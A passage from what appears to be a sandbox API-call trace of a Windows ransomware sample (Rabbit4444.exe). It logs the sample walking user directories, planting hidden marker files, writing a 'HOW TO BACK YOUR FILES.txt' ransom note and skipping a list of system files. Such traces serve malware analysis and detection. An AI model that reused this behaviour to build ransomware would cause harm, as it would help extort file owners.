hHeap=0xe0000, dwFlags=0x0, lpMem=0x115b68 | out: hHeap=0xe0000) returned 1 [0061.655] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1220a0 | out: hHeap=0xe0000) returned 1 [0061.655] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default\\AppData\\Local\\Microsoft" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft" [0061.655] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\" [0061.656] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\.BFC0E91B00AE8A0620D3" [0061.656] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0061.657] WriteFile (in: hFile=0x2a0, lpBuffer=0x11cdb90*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x11ccb48, lpOverlapped=0x0 | out: lpBuffer=0x11cdb90*, lpNumberOfBytesWritten=0x11ccb48*=0x3d4, lpOverlapped=0x0) returned 1 [0061.659] FlushFileBuffers (hFile=0x2a0) returned 1 [0061.660] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.660] CloseHandle (hObject=0x2a0) returned 1 [0061.661] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft") returned 40 [0061.661] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.661] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\*", lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3af063e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee11c5eb, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0061.661] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.661] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.661] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.661] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.661] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3af063e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee11c5eb, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.661] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.661] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.661] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.661] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.661] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.661] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee11c5eb, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee11c5eb, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee1427e5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.661] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.661] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.661] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe6dc3522, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa27e7c13, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xa27e7c13, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="InputPersonalization", cAlternateFileName="INPUTP~1")) returned 1 [0061.661] lstrcmpiW (lpString1="InputPersonalization", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.661] lstrcmpiW (lpString1="InputPersonalization", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.661] lstrcmpiW (lpString1="InputPersonalization", lpString2="Rabbit4444.exe") returned -1 [0061.662] lstrcmpiW (lpString1="InputPersonalization", lpString2=".") returned 1 [0061.662] lstrcmpiW (lpString1="InputPersonalization", lpString2="..") returned 1 [0061.662] lstrcmpiW (lpString1="InputPersonalization", lpString2="windows") returned -1 [0061.662] lstrcmpiW (lpString1="InputPersonalization", lpString2="bootmgr") returned 1 [0061.662] lstrcmpiW (lpString1="InputPersonalization", lpString2="pagefile.sys") returned -1 [0061.662] lstrcmpiW (lpString1="InputPersonalization", lpString2="boot") returned 1 [0061.662] lstrcmpiW (lpString1="InputPersonalization", lpString2="ids.txt") returned 1 [0061.662] lstrcmpiW (lpString1="InputPersonalization", lpString2="NTUSER.DAT") returned -1 [0061.662] lstrcpyW (in: lpString1=0x11cebda, lpString2="InputPersonalization" | out: lpString1="InputPersonalization") returned="InputPersonalization" [0061.662] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1221a0 [0061.662] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x7c) returned 0x101c00 [0061.662] RtlInterlockedPushEntrySList (in: ListHead=0x1220c8, ListEntry=0x1221a8 | out: ListHead=0x1220c8, ListEntry=0x1221a8) returned 0x0 [0061.662] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x78624286, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x78624286, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0061.662] lstrcmpiW (lpString1="Windows", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.662] lstrcmpiW (lpString1="Windows", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.662] lstrcmpiW (lpString1="Windows", lpString2="Rabbit4444.exe") returned 1 [0061.662] lstrcmpiW (lpString1="Windows", lpString2=".") returned 1 [0061.662] lstrcmpiW (lpString1="Windows", lpString2="..") returned 1 [0061.662] lstrcmpiW (lpString1="Windows", lpString2="windows") returned 0 [0061.662] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3c89cf2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a9e2bf1, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WINDOW~1")) returned 1 [0061.662] lstrcmpiW (lpString1="Windows Sidebar", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.662] lstrcmpiW (lpString1="Windows Sidebar", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.662] lstrcmpiW (lpString1="Windows Sidebar", lpString2="Rabbit4444.exe") returned 1 [0061.662] lstrcmpiW (lpString1="Windows Sidebar", lpString2=".") returned 1 [0061.662] lstrcmpiW (lpString1="Windows Sidebar", lpString2="..") returned 1 [0061.662] lstrcmpiW (lpString1="Windows Sidebar", lpString2="windows") returned 1 [0061.662] lstrcmpiW (lpString1="Windows Sidebar", lpString2="bootmgr") returned 1 [0061.662] lstrcmpiW (lpString1="Windows Sidebar", lpString2="pagefile.sys") returned 1 [0061.662] lstrcmpiW (lpString1="Windows Sidebar", lpString2="boot") returned 1 [0061.662] lstrcmpiW (lpString1="Windows Sidebar", lpString2="ids.txt") returned 1 [0061.662] lstrcmpiW (lpString1="Windows Sidebar", lpString2="NTUSER.DAT") returned 1 [0061.662] lstrcpyW (in: lpString1=0x11cebda, lpString2="Windows Sidebar" | out: lpString1="Windows Sidebar") returned="Windows Sidebar" [0061.662] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1221c0 [0061.662] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x72) returned 0x10e668 [0061.663] RtlInterlockedPushEntrySList (in: ListHead=0x1220c8, ListEntry=0x1221c8 | out: ListHead=0x1220c8, ListEntry=0x1221c8) returned 0x1221a8 [0061.663] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3c8af60, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17d2dc32, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WindowsApps", cAlternateFileName="WINDOW~2")) returned 1 [0061.663] lstrcmpiW (lpString1="WindowsApps", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.663] lstrcmpiW (lpString1="WindowsApps", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.663] lstrcmpiW (lpString1="WindowsApps", lpString2="Rabbit4444.exe") returned 1 [0061.663] lstrcmpiW (lpString1="WindowsApps", lpString2=".") returned 1 [0061.663] lstrcmpiW (lpString1="WindowsApps", lpString2="..") returned 1 [0061.663] lstrcmpiW (lpString1="WindowsApps", lpString2="windows") returned 1 [0061.663] lstrcmpiW (lpString1="WindowsApps", lpString2="bootmgr") returned 1 [0061.663] lstrcmpiW (lpString1="WindowsApps", lpString2="pagefile.sys") returned 1 [0061.663] lstrcmpiW (lpString1="WindowsApps", lpString2="boot") returned 1 [0061.663] lstrcmpiW (lpString1="WindowsApps", lpString2="ids.txt") returned 1 [0061.663] lstrcmpiW (lpString1="WindowsApps", lpString2="NTUSER.DAT") returned 1 [0061.663] lstrcpyW (in: lpString1=0x11cebda, lpString2="WindowsApps" | out: lpString1="WindowsApps") returned="WindowsApps" [0061.663] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\WindowsApps", dwFileAttributes=0x10) returned 1 [0061.663] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122120 [0061.663] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x6a) returned 0x117770 [0061.663] RtlInterlockedPushEntrySList (in: ListHead=0x1220c8, ListEntry=0x122128 | out: ListHead=0x1220c8, ListEntry=0x122128) returned 0x1221c8 [0061.663] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3c8af60, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17d2dc32, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WindowsApps", cAlternateFileName="WINDOW~2")) returned 0 [0061.663] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0061.663] lstrcpyW (in: lpString1=0x11cebda, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.663] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0061.664] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x29c [0061.664] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.665] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.665] CloseHandle (hObject=0x29c) returned 1 [0061.665] CloseHandle (hObject=0x2a0) returned 1 [0061.665] GetCurrentThreadId () returned 0x2d4 [0061.665] RtlInterlockedPopEntrySList (in: ListHead=0x1220c8 | out: ListHead=0x1220c8) returned 0x122128 [0061.665] lstrcpynW (in: lpString1=0x11ceb88, lpString2="C:\\Users\\Default\\AppData\\Local\\Microsoft\\WindowsApps", iMaxLength=2048 | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\WindowsApps") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\WindowsApps" [0061.665] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0061.665] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122120 | out: hHeap=0xe0000) returned 1 [0061.665] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default\\AppData\\Local\\Microsoft\\WindowsApps" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\WindowsApps") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\WindowsApps" [0061.665] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\WindowsApps", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\WindowsApps\\") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\WindowsApps\\" [0061.665] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\WindowsApps\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\WindowsApps\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\WindowsApps\\.BFC0E91B00AE8A0620D3" [0061.665] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\WindowsApps\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windowsapps\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0061.667] WriteFile (in: hFile=0x2a0, lpBuffer=0x11cdb90*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x11ccb48, lpOverlapped=0x0 | out: lpBuffer=0x11cdb90*, lpNumberOfBytesWritten=0x11ccb48*=0x3d4, lpOverlapped=0x0) returned 1 [0061.670] FlushFileBuffers (hFile=0x2a0) returned 1 [0061.671] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\WindowsApps\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.671] CloseHandle (hObject=0x2a0) returned 1 [0061.671] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\WindowsApps") returned 52 [0061.671] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.671] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\WindowsApps\\*", lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3c8af60, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee1427e5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a10 [0061.672] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.672] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.672] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.672] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.672] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3c8af60, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee1427e5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.672] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.672] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.672] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.672] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.672] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.672] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee1427e5, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee1427e5, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee1427e5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.672] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.672] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.672] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee1427e5, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee1427e5, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee1427e5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0061.672] FindClose (in: hFindFile=0x102a10 | out: hFindFile=0x102a10) returned 1 [0061.672] lstrcpyW (in: lpString1=0x11cebf2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.672] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\WindowsApps\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windowsapps\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0061.672] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0061.672] CloseHandle (hObject=0x0) returned 0 [0061.672] CloseHandle (hObject=0xffffffff) returned 1 [0061.672] GetCurrentThreadId () returned 0x2d4 [0061.672] RtlInterlockedPopEntrySList (in: ListHead=0x1220c8 | out: ListHead=0x1220c8) returned 0x1221c8 [0061.672] lstrcpynW (in: lpString1=0x11ceb88, lpString2="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar", iMaxLength=2048 | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar" [0061.672] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10e668 | out: hHeap=0xe0000) returned 1 [0061.672] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1221c0 | out: hHeap=0xe0000) returned 1 [0061.673] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar" [0061.673] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\" [0061.673] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\.BFC0E91B00AE8A0620D3" [0061.673] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows sidebar\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0061.674] WriteFile (in: hFile=0x2a0, lpBuffer=0x11cdb90*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x11ccb48, lpOverlapped=0x0 | out: lpBuffer=0x11cdb90*, lpNumberOfBytesWritten=0x11ccb48*=0x3d4, lpOverlapped=0x0) returned 1 [0061.676] FlushFileBuffers (hFile=0x2a0) returned 1 [0061.677] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.677] CloseHandle (hObject=0x2a0) returned 1 [0061.678] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar") returned 56 [0061.678] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.678] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\*", lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3c89cf2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee168a0d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0061.678] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.678] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.678] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.678] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.678] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3c89cf2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee168a0d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.678] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.678] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.678] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.678] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.678] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.678] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee168a0d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee168a0d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee168a0d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.678] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.679] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.679] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3c8a984, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17d2dc32, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Gadgets", cAlternateFileName="")) returned 1 [0061.679] lstrcmpiW (lpString1="Gadgets", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.679] lstrcmpiW (lpString1="Gadgets", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.679] lstrcmpiW (lpString1="Gadgets", lpString2="Rabbit4444.exe") returned -1 [0061.679] lstrcmpiW (lpString1="Gadgets", lpString2=".") returned 1 [0061.679] lstrcmpiW (lpString1="Gadgets", lpString2="..") returned 1 [0061.679] lstrcmpiW (lpString1="Gadgets", lpString2="windows") returned -1 [0061.679] 